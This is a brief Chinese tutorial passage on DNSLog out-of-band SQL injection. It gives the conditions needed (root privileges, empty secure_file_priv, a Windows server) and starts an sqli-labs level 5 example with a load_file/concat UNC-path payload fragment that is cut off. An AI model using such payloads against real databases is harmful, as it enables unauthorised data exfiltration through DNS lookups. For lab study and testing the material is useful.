sql 注入 Dnslog
DNSLog注入原理
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
利用条件
sql注入dnslog 使用 load_file() 函数,所以需要root权限
secure_file_priv 需要为空,不然load_file利用失败
服务器要为Windows操作系统。\\xxx.com 用来解析域的,所以必须Windows操作系统。
案例
sqlibs 第5关
?id=1' and (select load_file(concat('\\\\'